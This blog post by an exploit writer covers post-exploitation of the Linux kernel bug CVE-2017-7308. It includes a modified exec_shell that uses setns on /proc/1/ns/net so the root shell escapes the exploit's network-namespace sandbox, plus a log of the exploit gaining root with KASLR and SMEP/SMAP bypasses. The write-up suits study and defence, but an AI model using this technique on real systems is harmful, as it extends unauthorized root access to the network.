As part of my daily work as an exploit writer, I decided to take a look at CVE-2017-7308, a Linux kernel vulnerability related to packet sockets. I will not go into detail about the bug itself or its exploitation, because Andrey Konovalov has already published an excellent write-up about it on the Project Zero blog. Instead, this post focuses on a small issue I ran into after exploiting the bug.

As said previously, the bug is related to Linux packet sockets. Specifically, and quoting Andrey:

The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled.

The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions but exploitation requires the CAP_NET_RAW capability to be able to create such sockets. In general, this is only available for privileged users. However, it's possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.

Andrey provided a PoC in order to demonstrate the exploitation of this vulnerability. If you compile the code and run it, you get a nice shell:


Great, we got a shell. So far, so good. But here's the thing: I wanted to do some network-related work after exploitation and found that I was completely isolated from the real network interfaces. Listing the network interfaces from the newly spawned shell gives this:


As seen in the image, we only have the loopback interface available and can't ping Google. At this point, the immediate questions are: why is this happening, and how do we fix it?

The first question is answered almost immediately by reading Andrey's post, looking at the source, and reading the Linux packet socket documentation.

In his code, he creates a new user namespace by calling the unshare function with the CLONE_NEWUSER flag [1]. This moves the calling process into a new user namespace that is not shared with any previously existing process. As said previously, this is a necessary condition for exploitation. Normally only privileged users hold the CAP_NET_RAW capability, but a process that creates a new user namespace gains a full set of capabilities inside it, which is what lets an unprivileged user create packet sockets. That's why he uses unshare(CLONE_NEWUSER).

Then, a second call to the unshare function is made, this time with the CLONE_NEWNET flag [2]. According to the docs, this flag will "Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process." Now things start to become clear. I understood the use of CLONE_NEWUSER, but why must the network be isolated? Again, Andrey's post has the answer. Basically, Andrey needed an isolated environment with no interference so that he could send packets with arbitrary content through the loopback interface and control the out-of-bounds write reliably. Doing this in an environment with lots of interfaces and lots of packet data coming and going would have lowered the reliability of the exploit.
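
The two unshare calls can be tried in isolation with a minimal sketch like the one below. It was written for this post and is not taken from Andrey's PoC; the helper name can_create_packet_socket_in_sandbox is hypothetical. It runs both calls in a forked child, so the caller's own namespaces stay untouched, and then tries to open a packet socket. As far as I understand the kernel's check, CAP_NET_RAW is evaluated against the user namespace that owns the socket's network namespace, so the sketch creates both namespaces before opening the socket. On systems where unprivileged user namespaces are disabled, it simply reports failure.

```c
#define _GNU_SOURCE
#include <arpa/inet.h>       /* htons */
#include <linux/if_ether.h>  /* ETH_P_ALL */
#include <sched.h>           /* unshare, CLONE_NEWUSER, CLONE_NEWNET */
#include <sys/socket.h>      /* socket, AF_PACKET, SOCK_RAW */
#include <sys/types.h>
#include <sys/wait.h>        /* waitpid, WIFEXITED, WEXITSTATUS */
#include <unistd.h>          /* fork, close, _exit */

/*
 * Hypothetical helper (not part of the PoC).
 * Returns 1 if a packet socket could be created inside fresh user and
 * network namespaces, 0 if any step failed, -1 if fork/waitpid failed.
 */
int can_create_packet_socket_in_sandbox(void)
{
    pid_t pid = fork();
    if (pid == -1)
        return -1;

    if (pid == 0) {
        /* Child: the namespace changes are confined to this process. */
        if (unshare(CLONE_NEWUSER) == -1)
            _exit(1);
        if (unshare(CLONE_NEWNET) == -1)
            _exit(1);

        int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
        if (s == -1)
            _exit(1);

        close(s);
        _exit(0);
    }

    /* Parent: translate the child's exit status into a boolean. */
    int status;
    if (waitpid(pid, &status, 0) == -1)
        return -1;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

A return value of 1 means an unprivileged user on that machine can reach the vulnerable code path's prerequisite, the packet socket, without any real privileges.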

Now that we understand the real problem, we must find a way around it. The answer is setns. This function is one of the three main functions in the namespace API. According to the docs: "The setns(2) system call allows the calling process to join an existing namespace. The namespace to join is specified via a file descriptor that refers to one of the /proc/[pid]/ns files". There are a few namespaces we can join; the one we are interested in is /proc/[pid]/ns/net. This file is a handle for the network namespace of the process. The only thing left is to decide which network namespace we must join. To be more specific, we need to know the PID of a process whose network namespace we want to join.

I decided to join the network namespace of PID 1. This is the PID of the init process in Linux. Since it is the first process the kernel starts and it runs with full privileges, I guessed it would have access to every network interface on the system. We need some privileges to join this network namespace, but that's not a problem for us because we can do it AFTER exploiting the bug and gaining root privileges :)
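
One way to check whether the shell really lives in a different network namespace than PID 1 is to compare the /proc/[pid]/ns/net entries. The sketch below relies on the behaviour described in namespaces(7): two processes share a namespace when the device ID and inode number of those entries match. The helper names same_net_namespace and in_init_net_namespace are hypothetical and do not come from the PoC. Note that examining /proc/1/ns/net usually requires privileges, so an unprivileged caller should expect -1 for PID 1.

```c
#include <stdio.h>      /* snprintf */
#include <sys/stat.h>   /* stat, struct stat */
#include <sys/types.h>  /* pid_t */
#include <unistd.h>     /* getpid */

/*
 * Hypothetical helper (not part of the PoC).
 * Returns 1 if both PIDs share a network namespace, 0 if they do not,
 * and -1 if either /proc/[pid]/ns/net entry could not be examined.
 */
int same_net_namespace(pid_t a, pid_t b)
{
    char path_a[64], path_b[64];
    struct stat st_a, st_b;

    snprintf(path_a, sizeof(path_a), "/proc/%ld/ns/net", (long)a);
    snprintf(path_b, sizeof(path_b), "/proc/%ld/ns/net", (long)b);

    /* stat() follows the symlink to the namespace object itself. */
    if (stat(path_a, &st_a) == -1 || stat(path_b, &st_b) == -1)
        return -1;

    return st_a.st_dev == st_b.st_dev && st_a.st_ino == st_b.st_ino;
}

/* Convenience wrapper: is the calling process in PID 1's namespace? */
int in_init_net_namespace(void)
{
    return same_net_namespace(getpid(), 1);
}
```

Called from the root shell, in_init_net_namespace() should return 0 while we are still inside the sandbox and 1 once the namespace of PID 1 has been joined.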

So, in order to join the network namespace of PID 1, we must first obtain a file descriptor for it. We do it this way:

int fd;
fd = open("/proc/1/ns/net", O_RDONLY);

Once we have a file descriptor, we pass it to setns. The second parameter indicates the type of namespace we want to join:

setns(fd, CLONE_NEWNET);

To test this, I slightly modified the exec_shell function from Andrey's PoC, which runs after privileges have been escalated:

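void exec_shell() {
        char *shell = "/bin/bash";
        char *args[] = {shell, "-i", NULL};

        int fd;

        /* Handle to the network namespace of PID 1 (init) */
        fd = open("/proc/1/ns/net", O_RDONLY);
        if (fd == -1) {
                perror("error opening /proc/1/ns/net");
        } else {
                /* Leave the sandbox namespace before spawning the shell */
                if (setns(fd, CLONE_NEWNET) == -1)
                        perror("error calling setns");
                close(fd);
        }

        execve(shell, args, NULL);
}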

After compiling and executing the exploit, here's the result:

fastix@fastix-virtual-machine:~$ gcc cve-2017-7308.c -o exploit
fastix@fastix-virtual-machine:~$ ./exploit 
[.] starting
[.] namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[.] done, kernel text:   ffffffffb5800000
[.] commit_creds:        ffffffffb58a5cf0
[.] prepare_kernel_cred: ffffffffb58a60e0
[.] native_write_cr4:    ffffffffb5864210
[.] padding heap
[.] done, heap is padded
[.] SMEP & SMAP bypass enabled, turning them off
[.] done, SMEP & SMAP should be off now
[.] executing get root payload 0x55fa39fa7612
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@fastix-virtual-machine:/home/fastix# id
uid=0(root) gid=0(root) groups=0(root)
root@fastix-virtual-machine:/home/fastix# ip link list
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000
    link/ether 00:0c:29:98:3b:85 brd ff:ff:ff:ff:ff:ff
root@fastix-virtual-machine:/home/fastix# ifconfig 
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet  netmask  broadcast
        inet6 fe80::5cd:ee6f:92b:ccc6  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:98:3b:85  txqueuelen 1000  (Ethernet)
        RX packets 69  bytes 9044 (9.0 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 85  bytes 9782 (9.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet  netmask
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 3329  bytes 206245 (206.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 3329  bytes 206245 (206.2 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

root@fastix-virtual-machine:/home/fastix# ping                                   
PING ( 56(84) bytes of data.
64 bytes from ( icmp_seq=1 ttl=50 time=52.7 ms
64 bytes from ( icmp_seq=2 ttl=50 time=54.6 ms
64 bytes from ( icmp_seq=3 ttl=50 time=51.9 ms
64 bytes from ( icmp_seq=4 ttl=50 time=53.7 ms
--- ping statistics ---
5 packets transmitted, 4 received, 20% packet loss, time 4008ms
rtt min/avg/max/mdev = 51.987/53.268/54.686/1.045 ms

As you can see, apart from the loopback interface, we now have the ens33 interface and can reach the outside world.
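
The same check can be made from code instead of from the shell. The following is a small sketch, assuming only the POSIX if_nameindex interface; the helper name list_interfaces is hypothetical. It prints every interface visible in the caller's network namespace, so inside the sandbox it should show only lo, and after the setns call it should also show the real interfaces such as ens33.

```c
#include <net/if.h>   /* if_nameindex, if_freenameindex */
#include <stdio.h>    /* printf, perror */

/*
 * Hypothetical helper (not part of the PoC).
 * Prints every interface visible in the caller's network namespace and
 * returns how many were found, or -1 if the list could not be obtained.
 */
int list_interfaces(void)
{
    struct if_nameindex *list = if_nameindex();
    if (list == NULL) {
        perror("if_nameindex");
        return -1;
    }

    int count = 0;
    /* The array is terminated by an entry whose if_index is 0. */
    for (struct if_nameindex *p = list; p->if_index != 0; p++) {
        printf("%u: %s\n", p->if_index, p->if_name);
        count++;
    }

    if_freenameindex(list);
    return count;
}
```

Calling list_interfaces() once before and once after setns gives a quick before-and-after comparison without depending on ip or ifconfig being installed on the target.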